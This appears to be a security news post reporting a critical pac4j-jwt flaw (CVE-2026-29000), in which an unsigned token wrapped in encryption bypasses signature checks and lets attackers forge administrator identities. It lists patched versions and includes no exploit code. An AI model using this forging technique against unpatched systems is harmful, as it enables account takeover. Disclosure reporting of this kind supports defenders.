Critical 10.0 CVSS Flaw in pac4j-jwt Lets Hackers Forge Admin Tokens

Ddos March 5, 2026 2 minutes read

Cybersecurity researchers have uncovered a critical vulnerability in pac4j-jwt, a popular Java-based library used to secure thousands of applications through JSON Web Tokens (JWT). The flaw, tracked as CVE-2026-29000 with a maximum CVSS score of 10.0, allows any remote attacker to forge administrative credentials—provided they possess the server’s RSA public key.

The vulnerability, discovered by the CodeAnt AI Security Research Team, resides in the JwtAuthenticator component during its handling of encrypted tokens (JWE).

Standard JWT security relies on a signature (JWS) to prove a token’s integrity. However, many enterprise systems also use encryption (JWE) to hide the token’s contents. The flaw in pac4j-jwt occurs when these two features are combined.

The “JWE-wrapped PlainJWT” Trick: An attacker can create a “PlainJWT”—a token with no signature—and wrap it inside a JWE encrypted with the server’s public key.
The Logic Error: When the server decrypts the token, the library’s internal toSignedJWT() function correctly returns null because the inner token is unsigned. However, the subsequent signature verification block is entirely skipped because it is gated by a simple null-check.
Silent Authentication: The library then proceeds to create a user profile using the unverified claims inside the token, essentially treating the forged “PlainJWT” as a trusted identity.

By forging a token with arbitrary “subject” and “role” claims, an attacker can impersonate any user, including system administrators, without ever knowing the server’s private signing key. This leads to:

Total System Compromise: Full access to administrative panels and sensitive data.
Lateral Movement: The ability to pivot into deeper corporate networks using hijacked credentials.

The maintainer of pac4j, Jérôme Leleu, has confirmed the flaw and released patches across all active development lines. Organizations using pac4j-jwt must prioritize these updates immediately:

Affected Branch	Recommended Version
4.x line	Upgrade to 4.5.9 or newer
5.x line	Upgrade to 5.7.9 or newer
6.x line	Upgrade to 6.3.3 or newer

The CodeAnt AI Security Research Team has published a full technical breakdown and a working proof-of-concept (PoC) on their blog to help security teams understand and test for this vulnerability.

Security experts advise that even after patching, organizations should review their JWT configurations to ensure they explicitly require signed tokens and avoid the “silent skip” pattern identified in this flaw.

Rate this post

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Support Our Threat Intelligence

Related posts:

Leave a Reply Cancel reply